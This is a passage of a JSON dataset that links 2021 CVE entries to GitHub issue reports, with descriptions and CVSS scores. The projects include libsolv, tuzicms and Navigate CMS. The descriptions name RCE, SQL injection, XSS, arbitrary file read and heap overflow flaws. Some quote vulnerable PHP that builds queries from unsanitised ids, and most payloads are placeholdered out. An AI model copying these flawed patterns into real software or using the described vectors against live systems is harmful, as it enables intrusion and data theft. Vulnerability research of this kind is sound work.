  73939. "description": "Lack of admin password leaves many publicly availble system vulnerable to RCE . As with many web based apps, the admin user can run arbitrary code on the underlying system via the web gui. While that may or may not be a security issue, and for meye use cases it probably isn\u2019t, I feel that the lack of password on the admin account has left many publicly available systems open to exploitation. I\u2019d suggest a feature to implement a random password on initial installation. Off hand, I don\u2019t really know how that would look. I may be able to implement something if I find time. Here is a link to my post about the code execution: URLTAG Long story short an admin can run arbitrary code via the option to run commands when motion is detected (obviously). Additionally, an admin can upload a backup that contains a malicious APITAG file that will execute arbitrary code.",
  73940. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  73941. "severity": "HIGH",
  73942. "baseScore": 7.2,
  73943. "impactScore": 5.9,
  73944. "exploitabilityScore": 1.2
  73945. },
  73946. {
  73947. "CVE_ID": "CVE-2021-44269",
  73948. "Issue_Url_old": "https://github.com/dbry/WavPack/issues/110",
  73949. "Issue_Url_new": "https://github.com/dbry/wavpack/issues/110",
  73950. "Repo_new": "dbry/wavpack",
  73951. "Issue_Created_At": "2021-11-23T17:17:36Z",
  73952. "description": "A heap Out of bounds Read in APITAG (src/pack_utils.c). Hi, I have found a heap out of bounds read bug in function APITAG base on the commit APITAG code that caused crash shows below: APITAG CODETAG Crash file: FILETAG",
  73953. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  73954. "severity": "MEDIUM",
  73955. "baseScore": 5.5,
  73956. "impactScore": 3.6,
  73957. "exploitabilityScore": 1.8
  73958. },
  73959. {
  73960. "CVE_ID": "CVE-2021-44273",
  73961. "Issue_Url_old": "https://github.com/e2guardian/e2guardian/issues/707",
  73962. "Issue_Url_new": "https://github.com/e2guardian/e2guardian/issues/707",
  73963. "Repo_new": "e2guardian/e2guardian",
  73964. "Issue_Created_At": "2021-11-20T21:40:29Z",
  73965. "description": "NUMBERTAG Missing SSL hostname check. I tried e2guardian in a virtual machine today, running it as a standalone transparent proxy with SSL MITM, with the following iptables rules that redirect traffic to it (where NUMBERTAG is the uid of the user that e2guardian runs as): CODETAG I found that e2guardian enables browser connections to sites that it should not allow. One example is FILETAG This is very serious, because anyone on the path, who can intercept the connection or poison the DNS cache and thus redirect e2guardian's outgoing connection to a host under his control, now can perform a successful MITM attack. All he needs is any valid certificate e2guardian will accept it for any host. FILETAG",
  73966. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
  73967. "severity": "HIGH",
  73968. "baseScore": 7.4,
  73969. "impactScore": 5.2,
  73970. "exploitabilityScore": 2.2
  73971. },
  73972. {
  73973. "CVE_ID": "CVE-2021-44299",
  73974. "Issue_Url_old": "https://github.com/NavigateCMS/Navigate-CMS/issues/29",
  73975. "Issue_Url_new": "https://github.com/navigatecms/navigate-cms/issues/29",
  73976. "Repo_new": "navigatecms/navigate-cms",
  73977. "Issue_Created_At": "2021-11-25T17:38:20Z",
  73978. "description": "Reflected XSS attack in PATHTAG with the theme parameter in APITAG NUMBERTAG EXPECTED BEHAVIOUR An authenticated malicious user can take advantage of a Reflected XSS vulnerability in the themes feature. exp APITAG FILETAG analysis PATHTAG line NUMBERTAG without any filter. CODETAG",
  73979. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  73980. "severity": "MEDIUM",
  73981. "baseScore": 5.4,
  73982. "impactScore": 2.7,
  73983. "exploitabilityScore": 2.3
  73984. },
  73985. {
  73986. "CVE_ID": "CVE-2021-44334",
  73987. "Issue_Url_old": "https://github.com/brackeen/ok-file-formats/issues/12",
  73988. "Issue_Url_new": "https://github.com/brackeen/ok-file-formats/issues/12",
  73989. "Repo_new": "brackeen/ok-file-formats",
  73990. "Issue_Created_At": "2021-03-26T08:44:18Z",
  73991. "description": "heap buffer overflow in APITAG at APITAG Version dev version, git clone FILETAG Environment Ubuntu NUMBERTAG bit Testcase CODETAG Command Compile test program: APITAG Compile test program with address sanitizer with this command: APITAG Result The result of running without ASAN: APITAG Information obtained by using ASAN: ERRORTAG Description A heap buffer overflow was discovered in ok_file_formats. The issue is being triggered in function APITAG at APITAG Poc Poc file is FILETAG .",
  73992. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  73993. "severity": "HIGH",
  73994. "baseScore": 7.8,
  73995. "impactScore": 5.9,
  73996. "exploitabilityScore": 1.8
  73997. },
  73998. {
  73999. "CVE_ID": "CVE-2021-44335",
  74000. "Issue_Url_old": "https://github.com/brackeen/ok-file-formats/issues/17",
  74001. "Issue_Url_new": "https://github.com/brackeen/ok-file-formats/issues/17",
  74002. "Repo_new": "brackeen/ok-file-formats",
  74003. "Issue_Created_At": "2021-06-07T05:03:03Z",
  74004. "description": "heap buffer overflow in function APITAG at APITAG . Version NUMBERTAG defd URLTAG Environment Ubuntu NUMBERTAG bit Testcase CODETAG Command Compile test program: APITAG Compile test program with address sanitizer with this command: APITAG Result The result of running without ASAN: APITAG Information obtained by using ASAN: ERRORTAG Description A heap buffer overflow was discovered in ok_file_formats. The issue is being triggered in function APITAG at APITAG Poc Poc file is FILETAG .",
  74005. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  74006. "severity": "HIGH",
  74007. "baseScore": 7.8,
  74008. "impactScore": 5.9,
  74009. "exploitabilityScore": 1.8
  74010. },
  74011. {
  74012. "CVE_ID": "CVE-2021-44339",
  74013. "Issue_Url_old": "https://github.com/brackeen/ok-file-formats/issues/15",
  74014. "Issue_Url_new": "https://github.com/brackeen/ok-file-formats/issues/15",
  74015. "Repo_new": "brackeen/ok-file-formats",
  74016. "Issue_Created_At": "2021-06-07T04:58:26Z",
  74017. "description": "heap buffer overflow in function APITAG at APITAG . Version NUMBERTAG defd URLTAG Environment Ubuntu NUMBERTAG Testcase CODETAG Command Compile test program: APITAG Compile test program with address sanitizer with this command: APITAG Result The result of running without ASAN: APITAG Information obtained by using ASAN: ERRORTAG Description A heap buffer overflow was discovered in ok_file_formats. The issue is being triggered in function APITAG at APITAG Poc Poc file is FILETAG .",
  74018. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  74019. "severity": "HIGH",
  74020. "baseScore": 7.8,
  74021. "impactScore": 5.9,
  74022. "exploitabilityScore": 1.8
  74023. },
  74024. {
  74025. "CVE_ID": "CVE-2021-44342",
  74026. "Issue_Url_old": "https://github.com/brackeen/ok-file-formats/issues/19",
  74027. "Issue_Url_new": "https://github.com/brackeen/ok-file-formats/issues/19",
  74028. "Repo_new": "brackeen/ok-file-formats",
  74029. "Issue_Created_At": "2021-06-07T05:05:25Z",
  74030. "description": "heap buffer overflow in function APITAG at APITAG Version NUMBERTAG defd URLTAG Environment Ubuntu NUMBERTAG bit Testcase CODETAG Command Compile test program: APITAG Compile test program with address sanitizer with this command: APITAG Result The result of running without ASAN: APITAG Information obtained by using ASAN: ERRORTAG Description A heap buffer overflow was discovered in ok_file_formats. The issue is being triggered in function APITAG at APITAG Poc Poc file is FILETAG .",
  74031. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  74032. "severity": "HIGH",
  74033. "baseScore": 7.8,
  74034. "impactScore": 5.9,
  74035. "exploitabilityScore": 1.8
  74036. },
  74037. {
  74038. "CVE_ID": "CVE-2021-44343",
  74039. "Issue_Url_old": "https://github.com/brackeen/ok-file-formats/issues/18",
  74040. "Issue_Url_new": "https://github.com/brackeen/ok-file-formats/issues/18",
  74041. "Repo_new": "brackeen/ok-file-formats",
  74042. "Issue_Created_At": "2021-06-07T05:04:12Z",
  74043. "description": "heap buffer overflow in PATHTAG Version NUMBERTAG defd URLTAG Environment Ubuntu NUMBERTAG bit Testcase CODETAG Command Compile test program: APITAG Compile test program with address sanitizer with this command: APITAG Result The result of running without ASAN: APITAG Information obtained by using ASAN: ERRORTAG Description A heap buffer overflow was discovered in ok_file_formats. The issue is being triggered in PATHTAG Poc Poc file is FILETAG .",
  74044. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  74045. "severity": "HIGH",
  74046. "baseScore": 7.8,
  74047. "impactScore": 5.9,
  74048. "exploitabilityScore": 1.8
  74049. },
  74050. {
  74051. "CVE_ID": "CVE-2021-44347",
  74052. "Issue_Url_old": "https://github.com/yeyinshi/tuzicms/issues/7",
  74053. "Issue_Url_new": "https://github.com/yeyinshi/tuzicms/issues/7",
  74054. "Repo_new": "yeyinshi/tuzicms",
  74055. "Issue_Created_At": "2021-11-28T13:01:01Z",
  74056. "description": "PATHTAG has APITAG PATHTAG line NUMBERTAG public function APITAG //dump($_POST); //exit; APITAG //\u6570\u636e\u5e93\u8868\uff0c\u914d\u7f6e\u6587\u4ef6\u4e2d\u5b9a\u4e49\u4e86\u8868\u524d\u7f00\uff0c\u8fd9\u91cc\u5219\u4e0d\u9700\u8981\u5199 $id = APITAG //dump($id); //exit; if ($id==null){ $this >error('\u8bf7\u9009\u62e9\u5220\u9664\u9879\uff01'); } //\u5224\u65adid\u662f\u6570\u7ec4\u8fd8\u662f\u4e00\u4e2a\u6570\u503c if(is_array($id)){ $where = 'id APITAG APITAG \u51fd\u6570\u8fd4\u56de\u4e00\u4e2a\u7531\u6570\u7ec4\u5143\u7d20\u7ec4\u5408\u6210\u7684\u5b57\u7b26\u4e32 }else{ $where = APITAG } //dump($where); //exit; $count=$m >where($where) APITAG //\u4fee\u6539\u8868\u5355\u7528save\u51fd\u6570 if ($count NUMBERTAG this >success(\"\u6210\u529f\u5220\u9664{$count}\u6761\uff01\"); } else { $this >error('\u6279\u91cf\u5220\u9664\u5931\u8d25\uff01'); } } } This's APITAG POC: URLTAG APITAG",
  74057. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  74058. "severity": "CRITICAL",
  74059. "baseScore": 9.8,
  74060. "impactScore": 5.9,
  74061. "exploitabilityScore": 3.9
  74062. },
  74063. {
  74064. "CVE_ID": "CVE-2021-44348",
  74065. "Issue_Url_old": "https://github.com/yeyinshi/tuzicms/issues/9",
  74066. "Issue_Url_new": "https://github.com/yeyinshi/tuzicms/issues/9",
  74067. "Repo_new": "yeyinshi/tuzicms",
  74068. "Issue_Created_At": "2021-11-28T13:04:16Z",
  74069. "description": "PATHTAG PATHTAG line NUMBERTAG public function APITAG { //\u67e5\u8be2\u6307\u5b9aid\u7684\u680f\u76ee\u4fe1\u606f APITAG APITAG >where(\"id=$id\") APITAG POC: URLTAG",
  74070. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  74071. "severity": "CRITICAL",
  74072. "baseScore": 9.8,
  74073. "impactScore": 5.9,
  74074. "exploitabilityScore": 3.9
  74075. },
  74076. {
  74077. "CVE_ID": "CVE-2021-44349",
  74078. "Issue_Url_old": "https://github.com/yeyinshi/tuzicms/issues/8",
  74079. "Issue_Url_new": "https://github.com/yeyinshi/tuzicms/issues/8",
  74080. "Repo_new": "yeyinshi/tuzicms",
  74081. "Issue_Created_At": "2021-11-28T13:02:52Z",
  74082. "description": "PATHTAG has APITAG PATHTAG line NUMBERTAG public function APITAG //\u67e5\u8be2\u6307\u5b9aid\u7684\u680f\u76ee\u4fe1\u606f APITAG APITAG >where(\"id=$id\") >order('column_sort') APITAG POC: URLTAG",
  74083. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  74084. "severity": "CRITICAL",
  74085. "baseScore": 9.8,
  74086. "impactScore": 5.9,
  74087. "exploitabilityScore": 3.9
  74088. },
  74089. {
  74090. "CVE_ID": "CVE-2021-44350",
  74091. "Issue_Url_old": "https://github.com/top-think/framework/issues/2613",
  74092. "Issue_Url_new": "https://github.com/top-think/framework/issues/2613",
  74093. "Repo_new": "top-think/framework",
  74094. "Issue_Created_At": "2021-11-29T01:27:44Z",
  74095. "description": "SQL injection vulnerability. Version NUMBERTAG APITAG Finally, error injection is triggered\uff1a FILETAG",
  74096. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  74097. "severity": "CRITICAL",
  74098. "baseScore": 9.8,
  74099. "impactScore": 5.9,
  74100. "exploitabilityScore": 3.9
  74101. },
  74102. {
  74103. "CVE_ID": "CVE-2021-44351",
  74104. "Issue_Url_old": "https://github.com/NavigateCMS/Navigate-CMS/issues/28",
  74105. "Issue_Url_new": "https://github.com/navigatecms/navigate-cms/issues/28",
  74106. "Repo_new": "navigatecms/navigate-cms",
  74107. "Issue_Created_At": "2021-11-25T14:27:44Z",
  74108. "description": "arbitrary file read vulnerability. exp after login ,we can see our sid in cookies FILETAG for example my sid is APITAG then you can get arbitrary file by APITAG FILETAG APITAG you can get some Sensitive information such as mysql user/password analysis FILETAG FILETAG and in PATHTAG FILETAG we can rewrite bypass this filter. suggest you can use APITAG \"hacker\") rather than APITAG \"\")",
  74109. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  74110. "severity": "HIGH",
  74111. "baseScore": 7.5,
  74112. "impactScore": 3.6,
  74113. "exploitabilityScore": 3.9
  74114. },
  74115. {
  74116. "CVE_ID": "CVE-2021-44550",
  74117. "Issue_Url_old": "https://github.com/stanfordnlp/CoreNLP/issues/1222",
  74118. "Issue_Url_new": "https://github.com/stanfordnlp/corenlp/issues/1222",
  74119. "Repo_new": "stanfordnlp/corenlp",
  74120. "Issue_Created_At": "2021-11-26T09:00:27Z",
  74121. "description": "Header Manipulation. URLTAG We found 'classifier' may be contaminated on line NUMBERTAG of APITAG unvalidated data in an HTTP response header can enable cache poisoning, cross site scripting, cross user defacement, page hijacking, cookie manipulation or open redirect..It will affect on line NUMBERTAG of APITAG NUMBERTAG and NUMBERTAG have similar problems.",
  74122. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  74123. "severity": "CRITICAL",
  74124. "baseScore": 9.8,
  74125. "impactScore": 5.9,
  74126. "exploitabilityScore": 3.9
  74127. },
  74128. {
  74129. "CVE_ID": "CVE-2021-44554",
  74130. "Issue_Url_old": "https://github.com/cybelesoft/virtualui/issues/1",
  74131. "Issue_Url_new": "https://github.com/cybelesoft/virtualui/issues/1",
  74132. "Repo_new": "cybelesoft/virtualui",
  74133. "Issue_Created_At": "2021-11-29T09:16:36Z",
  74134. "description": "Vulnerability User Enumeration Unauthenticated. Dear Cybele Software, My name is Daniel Morales, from the IT Security Team of ARHS Spikeseed. I recently found a vulnerability in Thinfinity APITAG that allows a malicious actor to enumerate users registered in the OS APITAG through APITAG How it works By accessing the vector, an attacker can determine if a username exists thanks to the message returned; it can be presented in different languages according to the configuration of APITAG Common users are administrator, admin, guest and krgtbt Payload The vulnerable vector is \" URLTAG \" where \"USERNAME\" need to be brute forced. Vulnerable versions It has been tested in APITAG version NUMBERTAG and NUMBERTAG",
  74135. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  74136. "severity": "MEDIUM",
  74137. "baseScore": 5.3,
  74138. "impactScore": 1.4,
  74139. "exploitabilityScore": 3.9
  74140. },
  74141. {
  74142. "CVE_ID": "CVE-2021-44568",
  74143. "Issue_Url_old": "https://github.com/openSUSE/libsolv/issues/425",
  74144. "Issue_Url_new": "https://github.com/opensuse/libsolv/issues/425",
  74145. "Repo_new": "opensuse/libsolv",
  74146. "Issue_Created_At": "2020-12-13T06:41:31Z",
  74147. "description": "libsolv \u201cresolve_dependencies\u201d function two heap overflow vulnerability. Description: There is two heap overflow vulnerability in function: static int resolve_dependencies APITAG solv, int level, int disablerules, Queue dq) at src/solver.c: line NUMBERTAG line NUMBERTAG if (r >d NUMBERTAG solv >decisionmap r >p] APITAG decisionmap[p NUMBERTAG line NUMBERTAG The first bug is caused by the dangerous variable APITAG If the value of index \u201c r >p\u201d is bigger than the size of APITAG there will be a heap overflow bug. Please reproduce this issue through the following APITAG PATHTAG [resolve_dependencies NUMBERTAG URLTAG If you configure CC with flag fsanitize=address, you will get the following outputs: str2job: bad line 'update A NUMBERTAG badarch APITAG testcase_read: cannot parse command 'nall' test NUMBERTAG Results differ: install k NUMBERTAG MENTIONTAG install k m NUMBERTAG MENTIONTAG test NUMBERTAG Results differ: +install c NUMBERTAG noarch MENTIONTAG install k m NUMBERTAG MENTIONTAG c NUMBERTAG noarch MENTIONTAG +install k m NUMBERTAG MENTIONTAG setsolverflags: unknown flag APITAG setsolverflags: unknown flag 'transaction' setsolverflags: unknown flag ' APITAG ' test NUMBERTAG Results differ: install A NUMBERTAG no +install k NUMBERTAG MENTIONTAG +install k m NUMBERTAG MENTIONTAG +problem ca NUMBERTAG eb info package c NUMBERTAG noarch conflicts with k NUMBERTAG provided by k NUMBERTAG problem ca NUMBERTAG eb solution NUMBERTAG d4bc NUMBERTAG f allow k NUMBERTAG MENTIONTAG +problem ca NUMBERTAG eb solution NUMBERTAG d4bc NUMBERTAG f allow k NUMBERTAG MENTIONTAG +problem ca NUMBERTAG eb solution NUMBERTAG d4bc NUMBERTAG f allow k NUMBERTAG MENTIONTAG +problem ca NUMBERTAG eb solution NUMBERTAG deljob install name c testcase_read: cannot parse command 'solveflag>' setsolverflags: unknown flag 'yumobsol6eb' setsolverflags: unknown flag 'solution' setsolverflags: unknown flag NUMBERTAG setsolverflags: unknown flag 'deljob' 
setsolverflags: unknown flag 'install' setsolverflags: unknown flag 'name' setsolverflags: unknown flag 'c' str2job: bad line 'update A NUMBERTAG badarch APITAG testcase_read: cannot parse command 'nall' test NUMBERTAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG c0 at pc NUMBERTAG fab NUMBERTAG a NUMBERTAG a6c bp NUMBERTAG ffc NUMBERTAG f NUMBERTAG sp NUMBERTAG ffc NUMBERTAG f NUMBERTAG READ of size NUMBERTAG at NUMBERTAG c0 thread T NUMBERTAG fab NUMBERTAG a NUMBERTAG a6b in resolve_dependencies PATHTAG NUMBERTAG fab NUMBERTAG a NUMBERTAG ba4 in solver_run_sat PATHTAG NUMBERTAG fab NUMBERTAG a4d NUMBERTAG a in solver_solve PATHTAG NUMBERTAG f1eea in main PATHTAG NUMBERTAG fab NUMBERTAG a NUMBERTAG bf6 in __libc_start_main PATHTAG NUMBERTAG e6f9 in _start ( PATHTAG NUMBERTAG c0 is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG abe NUMBERTAG in calloc PATHTAG NUMBERTAG fab NUMBERTAG b NUMBERTAG f NUMBERTAG in solv_calloc PATHTAG NUMBERTAG fab NUMBERTAG a0eb9a in solver_create PATHTAG NUMBERTAG fab NUMBERTAG fc NUMBERTAG d4 in testcase_read PATHTAG NUMBERTAG f NUMBERTAG b in main PATHTAG NUMBERTAG fab NUMBERTAG a NUMBERTAG bf6 in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in resolve_dependencies Shadow bytes around the buggy address NUMBERTAG c0c7fff NUMBERTAG e0: fd fd fd fd fa fa fa fa fd fd fd fd fd fd fd fd NUMBERTAG c0c7fff NUMBERTAG f0: fa fa fa fa fd fd fd fd fd fd fd fa fa fa fa fa NUMBERTAG c0c7fff NUMBERTAG fd fd fd fd fd fd fd fd fa fa fa fa fd fd fd fd NUMBERTAG c0c7fff NUMBERTAG fd fd fd fd fa fa fa fa fd fd fd fd fd fd fd fd NUMBERTAG c0c7fff NUMBERTAG fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa NUMBERTAG c0c7fff NUMBERTAG fa]fa fa fa fd fd fd fd NUMBERTAG c0c7fff NUMBERTAG fd fd fd fd fa fa fa fa fd fd fd fd fd fd fd fd NUMBERTAG c0c7fff NUMBERTAG fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa NUMBERTAG c0c7fff NUMBERTAG fd fd fd fd 
fd fd fd fd fa fa fa fa fd fd fd fd NUMBERTAG c0c7fff NUMBERTAG fd fd fd fd fa fa fa fa fd fd fd fd fd fd fd fd NUMBERTAG c0c7fff NUMBERTAG fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc NUMBERTAG ABORTING The second bug is same with the above heap overflow bug, which is caused by the dangerous variable APITAG The index \u201cp\u201d is dependent on variable \u201cdp\u201d, and variable \u201cdp\u201d is equal with pool >whatprovidesdata + r >d. If the value of index \u201cp\u201d is bigger than the size of \u201cdecisionmap\u201d, there will be a heap overflow vulnerability. Our APITAG file can make the value of index \u201cp\u201d is bigger than the size of \u201cdecisionmap\u201d. 
Please reproduce this issue through the following APITAG PATHTAG [resolve_dependencies NUMBERTAG URLTAG If you configure CC with flag fsanitize=address, you will get the following outputs: testcase_read: could not open PATHTAG test NUMBERTAG Transaction summary: str2job: unknown job 'noable NUMBERTAG testtags APITAG ' testcase_read: system: unknown repo 'system' testcase_read: could not open PATHTAG testcase_read: system: unknown repo 'system' str2job: bad line 'in' testcase_read: cannot parse command APITAG test NUMBERTAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b8 at pc NUMBERTAG f3afbc2eacd bp NUMBERTAG ffec NUMBERTAG f9f NUMBERTAG sp NUMBERTAG ffec NUMBERTAG f9f NUMBERTAG READ of size NUMBERTAG at NUMBERTAG b8 thread T NUMBERTAG f3afbc2eacc in resolve_dependencies PATHTAG NUMBERTAG f3afbc NUMBERTAG ba4 in solver_run_sat PATHTAG NUMBERTAG f3afbc NUMBERTAG a in solver_solve PATHTAG NUMBERTAG f1eea in main PATHTAG NUMBERTAG f3afac NUMBERTAG bf6 in __libc_start_main PATHTAG NUMBERTAG e6f9 in _start ( PATHTAG NUMBERTAG b8 is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG abe NUMBERTAG in calloc PATHTAG NUMBERTAG f3afbd NUMBERTAG f NUMBERTAG in solv_calloc PATHTAG NUMBERTAG f3afbc0ab9a in solver_create PATHTAG NUMBERTAG f3b NUMBERTAG c NUMBERTAG d4 in testcase_read PATHTAG NUMBERTAG f NUMBERTAG b in main PATHTAG NUMBERTAG f3afac NUMBERTAG bf6 in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in resolve_dependencies Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff7fe NUMBERTAG c NUMBERTAG fff7ff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fd fd fd fd fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fd fd fd fd fd fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa]fa fa fd fd fd fd fd fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG 
fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fd fd fd fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc NUMBERTAG ABORTING The ASAN outputs information about these overflow bug. And attacker can use this bug to achieve a APITAG attack. Please reproduce and fix these two bugs.",
  74148. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74149. "severity": "MEDIUM",
  74150. "baseScore": 6.5,
  74151. "impactScore": 3.6,
  74152. "exploitabilityScore": 2.8
  74153. },
  74154. {
  74155. "CVE_ID": "CVE-2021-44584",
  74156. "Issue_Url_old": "https://github.com/emlog/emlog/issues/113",
  74157. "Issue_Url_new": "https://github.com/emlog/emlog/issues/113",
  74158. "Repo_new": "emlog/emlog",
  74159. "Issue_Created_At": "2021-11-12T10:12:19Z",
  74160. "description": "emlog pro NUMBERTAG has XSS Vulnerability. APITAG APITAG FILETAG",
  74161. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  74162. "severity": "MEDIUM",
  74163. "baseScore": 6.1,
  74164. "impactScore": 2.7,
  74165. "exploitabilityScore": 2.8
  74166. },
  74167. {
  74168. "CVE_ID": "CVE-2021-44585",
  74169. "Issue_Url_old": "https://github.com/jeecgboot/jeecg-boot/issues/3223",
  74170. "Issue_Url_new": "https://github.com/jeecgboot/jeecg-boot/issues/3223",
  74171. "Repo_new": "jeecgboot/jeecg-boot",
  74172. "Issue_Created_At": "2021-11-30T09:33:40Z",
  74173. "description": "\u53cd\u5c04\u578bXSS NUMBERTAG URLTAG \u622a\u56fe&\u4ee3\u7801\uff1a FILETAG",
  74174. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  74175. "severity": "MEDIUM",
  74176. "baseScore": 6.1,
  74177. "impactScore": 2.7,
  74178. "exploitabilityScore": 2.8
  74179. },
  74180. {
  74181. "CVE_ID": "CVE-2021-44586",
  74182. "Issue_Url_old": "https://github.com/qinming99/dst-admin/issues/28",
  74183. "Issue_Url_new": "https://github.com/qinming99/dst-admin/issues/28",
  74184. "Repo_new": "qinming99/dst-admin",
  74185. "Issue_Created_At": "2021-11-30T11:26:05Z",
  74186. "description": "A security issue. Hi,guys! There is a serious security problem in your code. About a few weeks ago, I found a function point in your website background that can lead to arbitrary file download But it must use a account and password. However, I found a new way to download any file in unauth. That means I can download any file without authorization without using my account and password . Here is the example APITAG Target: URLTAG And the http data is: CODETAG poc: PATHTAG Remember to use burpsuite not browser Have a nice day!",
  74187. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  74188. "severity": "HIGH",
  74189. "baseScore": 7.5,
  74190. "impactScore": 3.6,
  74191. "exploitabilityScore": 3.9
  74192. },
  74193. {
  74194. "CVE_ID": "CVE-2021-44590",
  74195. "Issue_Url_old": "https://github.com/libming/libming/issues/236",
  74196. "Issue_Url_new": "https://github.com/libming/libming/issues/236",
  74197. "Repo_new": "libming/libming",
  74198. "Issue_Created_At": "2021-12-01T06:02:37Z",
  74199. "description": "Memory allocation failure in cws2fws. version: master(commit NUMBERTAG aee NUMBERTAG command: listswf $FILE ERRORTAG A large integer passed to realloc, causing the allocation failure. The detailed call chain analysis is as follows. Download poc URLTAG ERRORTAG",
  74200. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74201. "severity": "MEDIUM",
  74202. "baseScore": 6.5,
  74203. "impactScore": 3.6,
  74204. "exploitabilityScore": 2.8
  74205. },
  74206. {
  74207. "CVE_ID": "CVE-2021-44591",
  74208. "Issue_Url_old": "https://github.com/libming/libming/issues/235",
  74209. "Issue_Url_new": "https://github.com/libming/libming/issues/235",
  74210. "Repo_new": "libming/libming",
  74211. "Issue_Created_At": "2021-12-01T05:31:44Z",
  74212. "description": "Memory allocation failure caused by the missing boundary check in APITAG version: master(commit NUMBERTAG aee NUMBERTAG URLTAG ) command: listswf $FILE ERRORTAG The cause of this bug is the lack of boundary checks. Specifically, in the APITAG function, the size of end and APITAG is not compared when APITAG is called. As a result, APITAG may be a negative integer, which eventually leads to allocation failure. The detailed call chain analysis is as follows. Download poc URLTAG ERRORTAG",
  74213. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74214. "severity": "MEDIUM",
  74215. "baseScore": 6.5,
  74216. "impactScore": 3.6,
  74217. "exploitabilityScore": 2.8
  74218. },
  74219. {
  74220. "CVE_ID": "CVE-2021-44608",
  74221. "Issue_Url_old": "https://github.com/alexlang24/bloofoxCMS/issues/12",
  74222. "Issue_Url_new": "https://github.com/alexlang24/bloofoxcms/issues/12",
  74223. "Repo_new": "alexlang24/bloofoxcms",
  74224. "Issue_Created_At": "2021-12-01T15:46:38Z",
  74225. "description": "APITAG Cross Site Scripting (XSS) APITAG I found two Authenticated Cross Site Scripting in 'file' parameter and 'type' parameter Cross Site Scripting in the parameter 'file' APITAG FILETAG Cross Site Scripting in the parameter 'type' APITAG FILETAG Impact The attacker can execute a HTML/JS Code the attacker can stealing cookies",
  74226. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  74227. "severity": "MEDIUM",
  74228. "baseScore": 5.4,
  74229. "impactScore": 2.7,
  74230. "exploitabilityScore": 2.3
  74231. },
  74232. {
